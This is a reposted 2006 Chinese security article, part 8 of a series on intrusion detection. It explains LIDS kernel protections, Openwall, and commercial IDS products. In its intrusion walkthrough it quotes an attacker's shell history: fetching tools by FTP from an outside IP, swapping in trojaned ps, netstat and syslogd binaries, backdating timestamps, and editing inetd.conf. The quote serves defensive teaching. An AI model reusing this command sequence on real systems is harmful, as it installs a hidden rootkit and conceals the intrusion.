通行证: 用户 密码 域名空间  下载中心 社区论坛 信息公告 my小屋
联系我们
设为首页
加入收藏

 

qq,asp,php,jsp,xml,sql,.net,编程 程序 网页图象 建站经验 私服
首页 | 新闻资讯 | 编程开发 | 网页设计 | 图形图象 | 网络媒体 | 网站模板 | 数 据 库 | 投稿
论坛 | 操作系统 | 系统优化 | 网络安全 | 黑客技术 | 硬件学堂 | 硬件报价 | 服 务 器 | 地图
专题 | 应用软件 | 聊天通讯 | q q 专栏 | 建站经验 | 在线工具 | 站长club | 注 册 表 | 旧版
社会 | 游戏娱乐 | 设计欣赏 | 疑难解答 | 社区论坛 | 韩国素材 | 素材图库 | 广告服务 | 服务
当前位置:首页>>网络安全>>安全防范>>正文 新版上线![旧版]
注:打开慢时请稍等

网络安全讲座之八:ids系统(8)

http://www.iyit.net  日期:2006-5-29 14:14:23  来源:网络转载    点击:
参加讨论  lids能够保护什么?

  快速的浏览lids的文档就可以了解lids的一系列特性。而我认为下面的这些特性是最重要的:

  cap_linux_immutable 当文件和外那间系统被标识"immutable"防止被写; cap_net_admin 防止篡改网络配置(例如:防止路由表被修改);

  cap_sys_module 防止内核模块被插入或者移除;cap_sys_rawio 防止损坏磁盘或者设备i/o;

  cap_sys_admin 防止大范围的使用其他系统功能;

  init_children_lock which prevents child processes of the init() master process from being tampered with.

  无论在哪个点,上面这些特性都能够通过命令"lidsadm -i"来启动,通过"lidsadm -s"来禁用(可以允许真正的系统管理员来进行系统配置),同时提供已经安装在内核中的lids口令(是通过ripemd-160加密的)。

  剖析一次入侵

  当黑客把一些系统守护进程的缓冲区溢出以后就可以获得root权限,这个时候就是主机被入侵了(事实上是不可能发生的,但是安装linux系统的人忘记了打上redhat最新的关于缓冲区溢出的补丁程序,并且让系统一直运行着)。当然一些黑客也不够小心,当他们侵入主机后,很急切的获得了shell,但是他们经常没有考虑到bash的命令将会被存入系统日志文件中,简单的阅读/.bash_history就可以了解黑客到底怎么机器上面作了一些什么事情。这个文件我们可以看看(为了更加简单我们做过一些细微的修改): mkdir /usr/lib/... ; cd /usr/lib/...ftp 200.192.58.201 21

  cd /usr/lib/...
  mv netstat.gz? netstat.gz; mv ps.gz? ps.gz; mv pstree.gz? pstree.gz;
  mv pt07.gz? pt07.gz; mv slice2.gz? slice2.gz; mv syslogd.gz? syslogd.gz;
  mv tcpd.gz? tcpd.gz
  gzip -d *
  chmod +x *
  mv netstat /bin ; mv ps /bin ; mv tcpd /usr/sbin/; mv syslogd /usr/sbin;
  mv pt07 /usr/lib/; mv pstree /usr/bin ;
  /usr/lib/pt07
  touch -t 199910122110 /usr/lib/pt07
  touch -t 199910122110 /usr/sbin/syslogd
  touch -t 199910122110 /usr/sbin/tcpd
  touch -t 199910122110 /bin/ps
  touch -t 199910122110 /bin/netstat
  touch -t 199910122110 /usr/bin/pstree
  cat /etc/inetd.conf | grep -v 15678 >> /tmp/b
  mv /tmp/b /etc/inetd.conf
  killall -hup inetd

  通读这些内容,我们就可以了解下面的一些动作:

  系统中建立了一个名字异常的目录(/usr/lib),接着黑客telnet到了自己的主机上面(200.192.58.201,是brazil某个地方的拨号用户),同时下载了一套黑客工具。这些黑客工具尸没有经过压缩的,中间的一些特洛伊二进制程序被安装到了系统中了,这些特洛伊程序覆盖了系统的netstat,ps, tcpd, syslogd和pstree命令。这些程序是用来报告系统有那些进程正在运行,那些端口是打开的。

  我们从中能学到什么呢?

  首先,lids是不能阻止一次入侵的,黑客连接上主机通过缓冲区溢出的方式获得系统的root权限。一旦系统没有黑客入侵,我们看看lids是如何使破坏降到最低的。

  lids通过cap_linux_immutable选项可以防止特洛尹程序被写入到/bin,/usr/bin,/usr/sbin和/usr/lib目录中。这些目录我们一般都会标识为不可变的(chattr +i),因而也不会被修改。我们可以注意到,就算不使用lids,也可以通过chattr +i命令来标识目录为不可变的,但是如果是通过lids以后,即使是root也不能篡改不可变标识位。类似的,如果文件通过chattr +i被标识为,touck -t这个命令也会失败。甚至第一行的"mkdir /etc/lib"这个命令也会失败,如果我们标识文件为不可读的话。

  lids不能防止黑客入侵,但是可以防止入侵的黑客在侵入后进行很大的系统破坏。一个后门程序可以被安装上系统,但是没有特洛亦版本的ps,netstat和pstree能够很早的发现这个后门进程,然后kill之。如果没有lids,我们不可能知道黑客通过这个后门程序会做一些什么事情,我们唯一能够进行挽回的工作就是重装系统。

  openwall和lids----额外的层

  另外一个和lids相似的系统是openwall工程。openwall工程在很多地方和lids不一样,有一个openwall的特别的补丁就是使栈区为不可执行。下面是摘自openwall的readme文档里面的申明:

  大多数缓冲区溢出攻击都是基于覆盖一些随意的程序片段中的函数返回值在堆栈中的地址,如果堆栈为不可执行,那么缓冲区溢出的弱点将会变得很难攻击。另外一种缓冲区溢出的方式是在libc中指出一个函数的返回地址,通常是system()。这个补丁通过修改mmap()化的共享库,使其总是一个零字节的文件。这样使其不能再指定一些数据,在很多攻击中不得不使用asciiz字符串。

  最近,在lids的网上上有一些完整的lids+openwall的内核补丁,这样可以提供lids和openwall都具备的特性。

  在linux系统中,通过使用这一系列的多层的安全措施,可以防止很大范围的攻击,同时还可以防止入侵或者篡改。系统被黑客入侵口就是网络接口,在网络接口,系统内核上我们都可以防止他人的入侵。意识到系统中的一些潜在的安全漏洞。任何运行在系统上的守护进程或者服务,不管是root用户还是非root用户运行的,都能够成为一个潜在的安全威胁。充分准备好面对这些威胁。

  入侵监测系统软件

  突出的ids厂商包括axent,iss和platinum technology。在你选择产品时,请充分考虑哪一款产品更适合你的公司。有些产品具有优秀的图形界面,很容易使用。其它产品可能更具有扩展性。下列是部分厂商列表:

  ·axent intruder alert(http://www.axent.com/)cisco netranger(http://www.cisco.com/)
  ·iss realsecure(http://www.iss.net/)
  ·computer associates’ etrust intrusion detection(formerly sessionwall 3)
  ·computer misuse detection system(http://www.cmds.net/)
  ·network flight recorder(http://www.nfr.com)
  ·network associates’ cybercop monitor(http://www.networkassociates.com)

  intruder alert

  intruder alert(ita)是使用管理者/代理结构的功能强大的产品。管理者和代理可以运行于unix,nt和novell网络中。ita的第一个优点是它可以在许多网络环境中应用。由于公司很少只应用单一厂商的产品,所以你选择的ids应该可以适用于尽可能多的厂商的产品。

  ita的第二个优点是其分布式的管理结构。ita软件包由两个服务和三个应用程序组成:

  ·ita manager(充当服务,守护进程或novell的可装载的模块)
  ·ita agent(充当服务,守护进程或novell的可装载的模块)
  ·ita admin(用来配置代理的应用程序)
  ·ita view(用于查询代理的程序)
  ·ita setup(从管理者域中添加和删除代理的程序)



编辑:黑鹰 [发送给好友] [打印本页] [关闭窗口] [返回顶部]
上一篇:网络安全讲座之八:ids系统(7)
下一篇:网络安全讲座之八:ids系统(9)
转载请注明来源:www.iyit.net
特别声明: 本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载,但请务必注明出处和原始作者。文章版权归文章原始作者所有。对于被本站转载文章的个人和网站,我们表示深深的谢意。如果本站转载的文章有版权问题请联系编辑人员,我们尽快予以更正。

 相关文章
安全性与iis (四) 安全性与iis (三) 安全性与iis (二)
安全配置和维护apache web server (下) 安全配置和维护apache web server (上) web服务器的安全和攻击防范 (五)
web服务器的安全和攻击防范 (四) web服务器的安全和攻击防范 (三) windows server 2003 虚拟主机的安全配
服务器安全设置(二十二) 服务器安全设置(二十一) 服务器安全设置(十九)
服务器安全设置(十八) 服务器安全设置(十七) 服务器安全设置(十六)
服务器安全设置(十五) 服务器安全设置(十四) 服务器安全设置(十二)
服务器安全设置(十一) 服务器安全设置(十) 服务器安全设置(九)
服务器安全设置(八) 服务器安全设置(七) 服务器安全设置(六)
最新更新 热点排行 推荐新闻
几种分布式攻击(icmp、syn flood、smu
搭建局域网内部sus服务
apache服务器的保护 (三)
apache服务器的保护 (一)
安全性与iis (四)
几种分布式攻击(icmp、syn flood、smu
搭建局域网内部sus服务
apache服务器的保护 (三)
apache服务器的保护 (一)
安全性与iis (四)
安全性与iis (三)
安全性与iis (二)
安全配置和维护apache web server (下
安全配置和维护apache web server (上
web服务器的安全和攻击防范 (五)
如何对付wga检查
小心摄像头成为黑客偷窥你的眼睛
恢复sql server系统数据库
网络安全问题的讨论和对策
浅谈黑客入侵的4条途径
优秀公益广告作品欣赏(8)
java数据类型转换
windows xp专业版iis连接数的更改
新开放qq免费挂级网站
优秀公益广告作品欣赏(7)
免费在qq上看在线电影电视听音乐
qq最新版下载 2006 beta2 体验新感受 
office2007简体中文版浮出水面 美图抢
qq珊瑚虫外挂4.0版本发布!
免费把qq炫铃设为本机qq的系统提示音
传统计算机病毒传播能力破坏性在提高
小心摄像头成为黑客偷窥你的眼睛
操作系统被入侵后的修复过程
传统计算机病毒传播能力破坏性在提高
内存为何有“两面性”
amd水货盒装cpu识别方法
ip地址资源2012年枯竭 部署ipv6很紧迫
古老问题有新解:世上先有鸡蛋后有鸡
dreamweaver mx 2004从零开始(1)
利用css改善网站可访问性
如何让mm的脸通透可人
msn8.0下载
asp 五大高效提速技巧
 友情链接
设置首 页 - 版权声明 - 广告服务 - 关于我们 - 联系我们 - 友情连接
copyrights © 2004-2006 iyit.net all rights reserved.
网站合作、广告联系qq:147007642、466949678
易特网络技术 点击这里给我发消息